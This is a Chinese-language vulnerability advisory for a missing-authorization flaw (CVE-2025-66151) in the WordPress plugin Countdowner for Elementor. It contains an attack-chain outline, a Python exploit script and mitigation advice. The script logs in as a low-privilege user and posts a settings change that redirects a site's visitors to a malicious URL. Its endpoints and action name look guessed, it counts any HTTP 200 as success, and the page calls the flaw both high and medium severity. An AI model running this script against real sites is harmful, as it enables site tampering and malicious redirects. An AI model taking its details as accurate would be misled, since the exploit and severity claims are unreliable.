CVE-2025-66151 WordPress Countdowner Elementor插件授权缺失漏洞

漏洞信息

漏洞编号

CVE-2025-66151

漏洞类型

访问控制/授权缺失

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

merkulove Countdowner for Elementor (countdowner-elementor)

漏洞概述

CVE-2025-66151是WordPress插件Countdowner for Elementor中的一个高危安全漏洞，属于Missing Authorization（授权缺失）类型。该漏洞允许具有低权限的攻击者（PR:L）通过网络（AV:N）利用配置错误的访问控制安全级别，执行超出其权限范围的操作。由于该插件在处理用户请求时未正确验证用户的访问权限，攻击者可以绕过正常的授权检查，访问或修改本应受保护的资源。此漏洞影响从n/a版本开始至1.0.4及以前的所有版本，CVSS评分为5.4（中危），对系统机密性和完整性造成较低程度的影响。

技术细节

Countdowner for Elementor插件在实现WordPress Elementor页面构建器的倒计时功能时，存在访问控制验证缺失的问题。漏洞根源在于插件的多个AJAX端点或管理功能未正确使用current_user_can()或wp_verify_nonce()等授权验证函数。攻击者可以利用该漏洞：1) 未经授权访问倒计时器的设置和配置功能；2) 修改或删除其他用户创建的倒计时内容；3) 可能通过插件功能进行进一步的攻击。由于该漏洞不需要用户交互（UI:N），攻击者可以在目标网站不知情的情况下自动化的发送恶意请求。漏洞的利用条件较低，只需攻击者拥有WordPress站点的基本注册用户账户即可尝试攻击。

攻击链分析

STEP 1

步骤1

攻击者注册并获取目标WordPress站点的低权限用户账户

STEP 2

步骤2

攻击者识别目标站点安装的Countdowner for Elementor插件版本（<=1.0.4）

STEP 3

步骤3

攻击者探测插件的AJAX端点和管理功能接口

STEP 4

步骤4

攻击者构造恶意请求，绕过授权检查直接访问受保护的功能

STEP 5

步骤5

利用授权缺失漏洞修改倒计时器设置或窃取敏感数据

STEP 6

步骤6

根据漏洞利用目的，攻击者可能进一步横向移动或提升权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-66151 PoC - Countdowner Elementor Authorization Bypass
# Affected: Countdowner for Elementor <= 1.0.4
# Type: Missing Authorization

import requests
import sys

target_url = "http://target-wordpress-site.com"
username = "attacker"
password = "attacker_password"

def exploit_cve_2025_66151():
    """
    This PoC demonstrates the authorization bypass vulnerability in Countdowner Elementor plugin.
    The plugin fails to properly check user capabilities before performing privileged actions.
    """
    session = requests.Session()
    
    # Step 1: Login to WordPress with low-privilege account
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }
    
    login_response = session.post(login_url, data=login_data)
    
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Login failed")
        return False
    
    print("[+] Login successful with low-privilege account")
    
    # Step 2: Exploit authorization bypass to access admin functions
    # Common vulnerable AJAX endpoints in the plugin
    vulnerable_endpoints = [
        f"{target_url}/wp-admin/admin-ajax.php",
        f"{target_url}/wp-content/plugins/countdowner-elementor/includes/admin-ajax.php"
    ]
    
    # Step 3: Send unauthorized request to manipulate countdown data
    exploit_data = {
        'action': 'countdowner_save_settings',
        'countdown_id': '1',
        'countdown_settings': '{"expiry_action":"redirect","redirect_url":"http://malicious-site.com"}',
        'nonce': ''  # Missing or weak nonce validation
    }
    
    for endpoint in vulnerable_endpoints:
        try:
            response = session.post(endpoint, data=exploit_data, timeout=10)
            if response.status_code == 200:
                print(f"[+] Sent exploit request to {endpoint}")
                print(f"[+] Response: {response.text[:200]}")
                return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Error connecting to {endpoint}: {e}")
            continue
    
    return False

if __name__ == "__main__":
    print("CVE-2025-66151 PoC - Countdowner Elementor Authorization Bypass")
    print("=" * 60)
    exploit_cve_2025_66151()

影响范围

Countdowner for Elementor <= 1.0.4

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1) 限制用户注册功能，仅允许受信任的用户注册；2) 使用Web应用防火墙（WAF）规则拦截异常的AJAX请求；3) 暂时禁用Countdowner for Elementor插件或替换为具有类似功能的安全插件；4) 加强对WordPress管理员账户的安全防护，使用强密码和双因素认证；5) 监控日志中的异常插件操作请求。